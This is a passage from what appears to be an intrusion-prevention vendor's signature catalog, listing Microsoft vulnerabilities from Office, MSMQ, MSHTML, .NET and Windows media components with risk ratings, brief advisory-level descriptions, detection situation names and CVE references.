There exists a vulnerability in Microsoft Malware Protection Engine, which can be exploited to cause denial of service. The vulnerability is due to insufficient validation of certain data values while parsing Portable Executable (PE) files compressed with PECompact. A remote attacker can exploit this vulnerability by sending a crafted PE file to the target, and potentially causing an access violation leading to a crash of the Malware Protection Engine. In a successful attack case, the affected service may terminate abnormally and cause a Denial of Service condition. In most products, the Microsoft Protection Engine service will restart automatically after a short delay (15 seconds in most cases).

Situation:

SMTP_CS-Microsoft-Malware-Protection-Engine-File-Processing-Denial-Of-Service

References:

CVE-2008-1437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1437

BID-29060
http://www.securityfocus.com/bid/29060

MS08-029
http://technet.microsoft.com/security/bulletin/MS08-029

Microsoft-Malware-Protection-Engine-Rar-Vmsf_RGB-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-1066-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Windows

Software:

Exchange Server

Type:

Input Validation

Description:

Improper handling of Rar files causes a memory corruption vulnerability in Microsoft Exchange. A succesful exploit may allow code execution with system privileges.

Situation:

File-Binary_Microsoft-Malware-Protection-Engine-Rar-Vmsf_RGB-Memory-Corruption

References:

CVE-2018-0986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0986

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Media-Center-CVE-2016-0185

About this vulnerability:

A vulnerability in Microsoft Media Center

Risk:

Moderate

First detected in:

sgpkg-ips-762-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Media Center

Type:

Input Validation

Description:

A vulnerability in Microsoft Media Center

Situation:

File-Text_Microsoft-Media-Center-CVE-2016-0185

References:

CVE-2016-0185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0185

MS16-059
http://technet.microsoft.com/security/bulletin/MS16-059

Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879

About this vulnerability:

Code execution vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-310-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008

Software:

<os>

Type:

Malfunction

Description:

There is a code execution vulnerability in Microsoft Windows. By persuading a target user to open a malicious media file, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.

Situation:

E-Mail_BS-Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
HTTP_SS-Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879
File-RIFF_Microsoft-Media-Decompression-Vulnerability-CVE-2010-1879

References:

CVE-2010-1879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1879

MS10-033
http://technet.microsoft.com/security/bulletin/MS10-033

Microsoft-Media-Foundation-Cmp4metadatahandler-Addqtmetadata-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1241-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper handling of records in QuickTime files causes a use after free vulnerability in Windows Media Foundation. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-MPEG_Microsoft-Media-Foundation-Cmp4metadatahandler-Addqtmetadata-Use-After-Free

References:

CVE-2019-1430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1430

Microsoft-Media-Foundation-Getkeyforindex-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1243-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper handling of QuickTime files causes an out of bounds read vulnerability in Windows Media Foundation. A successful exploit may result in the disclosure of data in system memory, which may help other attacks.

Situation:

File-MPEG_Microsoft-Media-Foundation-Getkeyforindex-Out-Of-Bounds-Read

References:

CVE-2020-0939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0939

Microsoft-Media-Player-Audio-Sampling-Rate-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Windows Media Player

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Player

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Windows Media Player 11. The vulnerability is due to insufficient memory allocation when playing audio files with different sampling rates within a single audio stream. An attacker may exploit this vulnerability by enticing a target user to open a malicious audio stream URL. Successful exploitation might lead to injection and execution of arbitrary code in the security context of the currently logged in user. In a attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. In an attack case where code injection is not successful, the vulnerable Windows Media Player application may terminate abnormally.

Situation:

RTSP_SS-Microsoft-Media-Player-Audio-Sampling-Rate-Memory-Corruption

References:

CVE-2008-2253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2253

BID-30550
http://www.securityfocus.com/bid/30550

MS08-054
http://technet.microsoft.com/security/bulletin/MS08-054

Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-30080

About this vulnerability:

A vulnerability in Microsoft Message Queuing Service

Risk:

High

First detected in:

sgpkg-ips-1736-5242

Last changed:

sgpkg-ips-1736-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported for the Message Queuing Service in Microsoft Windows.

Situation:

HTTP_CSH-Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-30080

References:

CVE-2024-30080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30080

ms24-jun
http://technet.microsoft.com/security/bulletin/ms24-jun

Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-49122

About this vulnerability:

An attempt to exploit a vulnerability in Windows detected

Risk:

High

First detected in:

sgpkg-ips-1809-5242

Last changed:

sgpkg-ips-1809-5242

Platform:

Windows

Software:

<os>

Type:

Use-after-free

Description:

Microsoft Message Queuing (MSMQ) remote code execution vulnerability CVE-2024-49122.

Situation:

Generic_CS-Microsoft-Message-Queuing-Binary-Protocol-Usage

References:

CVE-2024-49122
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49122

ms24-dec
http://technet.microsoft.com/security/bulletin/ms24-dec

Microsoft-Message-Queuing-Remote-Code-Execution-Vulnerability-CVE-2023-21554

About this vulnerability:

A vulnerability in Microsoft Message Queuing

Risk:

High

First detected in:

sgpkg-ips-1579-5242

Last changed:

sgpkg-ips-1582-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported for Message Queuing Service in Microsoft Windows. The vulnerability is due to improper handling of the incoming MSMQ packets. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted MSMQ packet to a MSMQ server. Successful exploitation of this vulnerability can result in execution of arbitrary code within the service.

Situation:

Generic_CS-Microsoft-Message-Queuing-Remote-Code-Execution-Vulnerability-CVE-2023-21554

References:

CVE-2023-21554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21554

ms23-apr
http://technet.microsoft.com/security/bulletin/ms23-apr

Microsoft-Message-Queuing-Service-Queue-Name-Handling-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Message Queuing Service

Risk:

High

First detected in:

sgpkg-ips-175-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 SP4

Software:

Microsoft Message Queuing

Type:

Input Validation

Description:

Situation:

Generic_MSRPC-CPS-Microsoft-Message-Queuing-Service-Queue-Name-Handling-Bind
MSRPC-TCP_CPS-Microsoft-Message-Queuing-Service-Queue-Name-Handling

References:

CVE-2008-3479
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3479

BID-31637
http://www.securityfocus.com/bid/31637

MS08-065
http://technet.microsoft.com/security/bulletin/MS08-065

Microsoft-Mime-Formatted-Request-Vulnerability-CVE-2011-1894

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Windows detected

Risk:

Moderate

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in the MHTML component allows an attacker to execute scripts in the user's context.

Situation:

HTTP_SS-Mime-Formatted-Request-Vulnerability-CVE-2011-1894
File-Text_Mime-Formatted-Request-Vulnerability-CVE-2011-1894

References:

CVE-2011-1894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1894

BID-48205
http://www.securityfocus.com/bid/48205

MS11-037
http://technet.microsoft.com/security/bulletin/MS11-037

Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1386-5242

Last changed:

sgpkg-ips-1389-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in the Microsoft MSHTML Platform.

Situation:

File-Text_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
File-RTF_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
File-TextId_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution

References:

CVE-2021-40444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444

Microsoft-MSHTML-Platform-CVE-2021-33742-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft ChakraCore

Risk:

High

First detected in:

sgpkg-ips-1372-5242

Last changed:

sgpkg-ips-1372-5242

Platform:

Windows

Software:

ChakraCore; Microsoft Edge; Internet Explorer

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in the Microsoft MSHTML Platform. The vulnerability is due to improper handling of objects in memory. A remote attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page or document. Successful exploitation could lead arbitrary code execution.

Situation:

File-Text_Microsoft-MSHTML-Platform-CVE-2021-33742-Remote-Code-Execution

References:

CVE-2021-33742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33742

ms21-jun
http://technet.microsoft.com/security/bulletin/ms21-jun

Microsoft-MsMpEng-RCE-CVE-2017-0290

About this vulnerability:

A vulnerability in Microsoft Malware Protection service

Risk:

Moderate

First detected in:

sgpkg-ips-900-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

MsMpEng

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in the MsMpEng Malware Protection service that is enabled by default on multiple Windows instances such as Windows 8, 8.1, 10, Windows Server 2012. A remote attacker can trigger the vulnerability in multiple ways, for example by e-mail or luring the victim to visit a malicious URL.

Situation:

File-Text_Microsoft-MsMpEng-RCE-CVE-2017-0290

References:

CVE-2017-0290
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0290

Microsoft-MsMpEng-Remote-Code-Execution-Vulnerability-CVE-2018-0986

About this vulnerability:

A vulnerability in Microsoft Malware Protection Engine

Risk:

High

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Windows

Software:

MsMpEng

Type:

Input Validation

Description:

There exists a remote code execution vulnerability in Microsoft Malware Protection Engine. Scanning a specially crafted file causes a memory corruption in the engine.

Situation:

File-Binary_Microsoft-Malware-Protection-Engine-Rar-Vmsf_RGB-Memory-Corruption

References:

CVE-2018-0986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0986

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Multiple-Products-HTML-Sanitization-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-826-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There exists a cross-site scripting vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Multiple-Products-HTML-Sanitization-Cross-Site-Scripting

References:

CVE-2012-1858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858

OSVDB-82861
http://www.osvdb.org/82861

MS12-039
http://technet.microsoft.com/security/bulletin/MS12-039

Microsoft-Multiple-Products-TrueType-Font-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Silverlight

Risk:

Moderate

First detected in:

sgpkg-ips-1036-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the Microsoft Windows Kernel. A remote attacker can use a malicious font file to exploit this, resulting in remote code execution in the Windows kernel.

Situation:

File-Binary_Microsoft-Multiple-Products-TrueType-Font-Parsing-Memory-Corruption

References:

CVE-2011-3402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3402

BID-50462
http://www.securityfocus.com/bid/50462

OSVDB-76843
http://www.osvdb.org/76843

MS11-087
http://technet.microsoft.com/security/bulletin/MS11-087

Microsoft-Negotiate-SSP-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A NULL pointer deference and a buffer overflow vulnerability exists in the Negotiate Security Support Provider (SSP) interface. The Negotiate SSP interface does not properly validate a value that is used during the authentication protocol selection. An attacker who successfully exploits this vulnerability can cause a Denial of Service, or remotely execute code. Triggering the NULL-pointer deference vulnerability leads to a memory access violation error and will cause the current thread in LSASRV.DLL to terminate. However, this exception will be captured and handled. The advisory claimed that this vulnerability would lead to the denial-of-service due to service termination, and eventual system shutdown; Assurent has not observed this behaviour in the lab. It has been claimed that triggering the buffer overrun vulnerability will lead to a denial-of-service attack in most cases due to the termination of LSASS.EXE. Both Windows 2000 and Windows XP will detect the unexpected termination of LSASS.EXE and restart the system. However, exploiting Windows Server 2003 will result in kernel failure or "blue-screen". In addition, an attacker may also be able to execute arbitrary code on the target, in which case the behaviour would vary on the nature of the injected code.

Situation:

HTTP_CSH-Microsoft-Negotiate-SSP-Buffer-Overflow

References:

CVE-2004-0119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0119

BID-10113
http://www.securityfocus.com/bid/10113

MS04-011
http://technet.microsoft.com/security/bulletin/MS04-011

Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-754-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Malfunction

Description:

The .NET framework has a vulnerability resulting from insecurely loading a dynamic library from a network share. Successful exploitation can allow the attacker to run code on the target host.

Situation:

HTTP_CRL-Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading
SMB-TCP_Microsoft-Net-Framework-Mscoreei.dll-Insecure-Library-Loading

References:

CVE-2016-0148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0148

MS16-041
http://technet.microsoft.com/security/bulletin/MS16-041

Microsoft-Net-Framework-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-988-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft .NET Framework

Type:

Input Validation

Description:

Improper parsing of WSDL files causes a code execution vulnerability in MS .Net. A successful attack allows arbitrary code to be execute on the target system with the privileges of the target process.

Situation:

File-Text_Microsoft-Net-Framework-Remote-Code-Execution

References:

CVE-2017-8759
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759

Microsoft-Net-Framework-Sharepoint-And-Visual-Studio-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft .NET Framework

Risk:

Moderate

First detected in:

sgpkg-ips-1267-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper handling of XML causes a remote code execution vulnerability in the Microsoft .NET Framework, SharePoint, and Visual Studio. A successful exploit allows an attacker to execute arbitrary code with the privileges of the target application.

Situation:

File-Text_Microsoft-Net-Framework-Sharepoint-And-Visual-Studio-Remote-Code-Execution

References:

CVE-2020-1147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1147

Microsoft-Netlogon-RPC-Null-Deference-Denial-Of-Service-CVE-2010-2742

About this vulnerability:

A vulnerability in Microsoft Netlogon RPC service

Risk:

Moderate

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Netlogon service.

Situation:

MSRPC-TCP_CPS-Microsoft-Netlogon-RPC-Null-Deference-Denial-Of-Service

References:

CVE-2010-2742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2742

MS10-101
http://technet.microsoft.com/security/bulletin/MS10-101

Microsoft-Network-Policy-Server-Radius-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

Moderate

First detected in:

sgpkg-ips-626-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in Microsoft Network Policy Server. The vulnerability is due to an error in processing certain specially crafted username strings. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted requests to the Network Policy Server. Successful exploitation could lead to a denial of service condition on the server.

Situation:

Generic_UDP-Microsoft-Network-Policy-Server-Radius-Denial-Of-Service

References:

CVE-2015-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0015

BID-71933
http://www.securityfocus.com/bid/71933

MS15-007
http://technet.microsoft.com/security/bulletin/MS15-007

Microsoft-Network-Policy-Server-Radius-Denial-Of-Service-CVE-2016-0050

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-733-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A denial of service condition can be caused by an atttacker through the exploitation of a RADIUS user name parsing vulnerability in Windows.

Situation:

Generic_UDP-Microsoft-Network-Policy-Server-Radius-Denial-Of-Service-CVE-2016-0050

References:

CVE-2016-0050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0050

MS16-021
http://technet.microsoft.com/security/bulletin/MS16-021

Microsoft-Ntlm-Authentication-After-HTTP-Redirect

About this vulnerability:	A vulnerability in Microsoft Windows
Risk:	High
First detected in:	sgpkg-ips-641-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows 7
Software:	Generic HTTP client
Type:	Malfunction
Description:	There is a vulnearbility in Microsoft Windows. When an appication receives HTTP redirect request to a file:// URI that points to a remote location, it attempts to use NTLM authentication to gain access. This might expose the current user credentials to an arbitrary server.
Situation:	HTTP_SHS-Redirect-To-File-URI

Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability

About this vulnerability:

Detected an attempt to exploit a vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-433-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Insecure Configuration

Description:

Detected an attempt to exploit a vulnerability in Microsoft Windows

Situation:

HTTP_CSU-Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability
SMB-TCP_Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability

References:

CVE-2012-0009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0009

BID-51297
http://www.securityfocus.com/bid/51297

MS12-002
http://technet.microsoft.com/security/bulletin/MS12-002

Microsoft-OData-Protocol-Replace-Denial-Of-Service-Vulnerability

About this vulnerability:

A vulnerability in Microsoft OData Protocol

Risk:

Moderate

First detected in:

sgpkg-ips-502-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Open Data (OData) Protocol.

Situation:

HTTP_CRL-Microsoft-OData-Protocol-Replace-Denial-Of-Service-Vulnerability

References:

CVE-2013-0005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0005

BID-57141
http://www.securityfocus.com/bid/57141

OSVDB-88968
http://www.osvdb.org/88968

MS13-007
http://technet.microsoft.com/security/bulletin/MS13-007

Microsoft-Office-Access-ActiveX-Control-Memory-Corruption-CVE-2010-0814

About this vulnerability:

A memory corruption vulnerability in Microsoft Office Access ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-321-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Office Access ActiveX Control. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.

Situation:

HTTP_SS-Microsoft-Office-Access-ActiveX-Control-Memory-Corruption-CVE-2010-0814
File-Text_Microsoft-Office-Access-ActiveX-Memory-Corruption-CVE-2010-0814

References:

CVE-2010-0814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0814

MS10-044
http://technet.microsoft.com/security/bulletin/MS10-044

Microsoft-Office-Art-Drawing-Records-CVE-2010-3334

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-353-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office XP; Microsoft Office 2003; Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2004; Microsoft Office 2008

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Office.

Situation:

HTTP_SS-Microsoft-Office-Art-Drawing-Records-CVE-2010-3334
File-OLE_Microsoft-Office-Art-Drawing-Records-CVE-2010-3334

References:

CVE-2010-3334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3334

BID-44656
http://www.securityfocus.com/bid/44656

MS10-087
http://technet.microsoft.com/security/bulletin/MS10-087

Microsoft-Office-Art-Property-Table-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-389-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A memory corruption vulnerability has been reported in Microsoft Office. The vulnerability is due to insufficient input validation when processing Art Property tables. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious Office document. Success exploitation could result in injection and execution of arbitrary code, any code injected and executed will be under the security context of the current logged on user. The behaviour of the target would depend on the intention of the malicious code. In case of unsuccessful code injection, the affected application could terminate abnormally.

Situation:

File-OLE_Microsoft-Office-Art-Property-Table-Memory-Corruption

References:

CVE-2009-2528
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2528

BID-36650
http://www.securityfocus.com/bid/36650

MS09-062
http://technet.microsoft.com/security/bulletin/MS09-062

Microsoft-Office-ASLR-Bypass-CVE-2015-2375

About this vulnerability:

A remote code execution vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Microsoft Office

Situation:

File-TextId_Microsoft-Office-ASLR-Bypass-CVE-2015-2375

References:

CVE-2015-2375
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2375

MS15-070
http://technet.microsoft.com/security/bulletin/MS15-070

Microsoft-Office-Bad-Index-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A memory-corruption vulnerability exists in Microsoft Office. The vulnerability is due to improper handling of objects when parsing a specially crafted Office document. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to open a specially crafted Office file. Successful exploitation allows the attacker to execute arbitrary code in the context of the current user.

Situation:

File-OLE_Microsoft-Office-Bad-Index-Memory-Corruption

References:

CVE-2014-6334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6334

BID-70962
http://www.securityfocus.com/bid/70962

OSVDB-114527
http://www.osvdb.org/114527

MS14-069
http://technet.microsoft.com/security/bulletin/MS14-069

Microsoft-Office-Buffer-Overflow-CVE-2013-1331

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office 2003; Microsoft Office 2011

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Office.

Situation:

File-OLE_Microsoft-Office-Buffer-Overflow-CVE-2013-1331
File-PNG_Microsoft-Multiple-Products-Buffer-Overflow

References:

CVE-2013-1331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1331

OSVDB-94127
http://www.osvdb.org/94127

MS13-051
http://technet.microsoft.com/security/bulletin/MS13-051

Microsoft-Office-Cgm-Image-Converter-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Microsoft Office. The vulnerability is due to the way Office allocates a buffer size when handling CGM image files. An attacker can leverage this vulnerability by enticing a target user to open a malicious file. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected product.

Situation:

File-Binary_Microsoft-Office-Cgm-Image-Converter-Buffer-Overflow

References:

CVE-2010-3945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3945

MS10-105
http://technet.microsoft.com/security/bulletin/MS10-105

Microsoft-Office-Ctasksymbol-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There exists a Use-After-Free vulnerability in Microsoft Office. A remote attacker can use this to execute arbitrary code in the context of the current user.

Situation:

File-OLE_Microsoft-Office-Ctasksymbol-Use-After-Free
File-TextId_Microsoft-Office-Ctasksymbol-Use-After-Free

References:

CVE-2015-1642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1642

MS15-081
http://technet.microsoft.com/security/bulletin/MS15-081

Microsoft-Office-CVE-2015-1649

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-638-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office 2007; Microsoft Office 2010; Microsoft Office 2011; Microsoft Office 2013; Microsoft Office 2013 RT; Microsoft Office Web Apps 2010; Microsoft Office Web Apps 2013; Microsoft Sharepoint Server 2010; Microsoft Sharepoint Server 2013

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Office. The vulnerability is due to improper handling of embedded objects when parsing a specially crafted Office document. A remote attacker could exploit this vulnerability by enticing a user to open a crafted Office file. Successful exploitation could result in arbitrary code execution with the privileges of the currently logged on user.

Situation:

File-TextId_Microsoft-Office-CVE-2015-1649

References:

CVE-2015-1649
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1649

MS15-033
http://technet.microsoft.com/security/bulletin/MS15-033

Microsoft-Office-CVE-2015-1650

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-638-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in Microsoft Office. The vulnerability is due to improper manipulation of objects in memory while parsing specially crafted Word files. A remote attacker can exploit this vulnerability by enticing a user open a maliciously crafted Word file. Successful exploitation could result in code execution in the context of the affected user.

Situation:

File-TextId_Microsoft-Office-CVE-2015-1650

References:

CVE-2015-1650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1650

MS15-033
http://technet.microsoft.com/security/bulletin/MS15-033

Microsoft-Office-CVE-2015-1682-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-646-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Office 2010; Microsoft Excel 2010; Microsoft PowerPoint 2010; Microsoft Office 2013; Microsoft Excel 2013; Microsoft PowerPoint 2013

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Microsoft Office.

Situation:

File-TextId_Microsoft-Office-CVE-2015-1682-Remote-Code-Execution

References:

CVE-2015-1682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1682

MS15-046
http://technet.microsoft.com/security/bulletin/MS15-046

Microsoft-Office-CVE-2016-0021

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

Moderate

First detected in:

sgpkg-ips-742-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Office.

Situation:

File-RTF_Microsoft-Office-CVE-2016-0021

References:

CVE-2016-0063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0063

MS16-029
http://technet.microsoft.com/security/bulletin/MS16-029

Microsoft-Office-CVE-2016-3234-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Office

Risk:

High

First detected in:

sgpkg-ips-771-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office; Microsoft Office Compatibility Pack; Microsoft Word

Type:

Malfunction

Description:

A vulnerability in multiple Microsoft Office applications which allows remote attacker to obtain sensitive information from process memory via a crafted Office document.

Situation:

